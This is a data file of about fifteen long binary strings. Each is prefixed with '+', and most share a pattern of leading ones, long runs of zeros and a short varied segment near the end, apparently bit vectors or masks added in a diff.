+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011001000110010011110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010100110101011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000110101011000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000000000000000000000000000000000000001000110000000010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011000000000000000000000000000000000000000001000110011111101111111111111111111111111111111111111111111111111 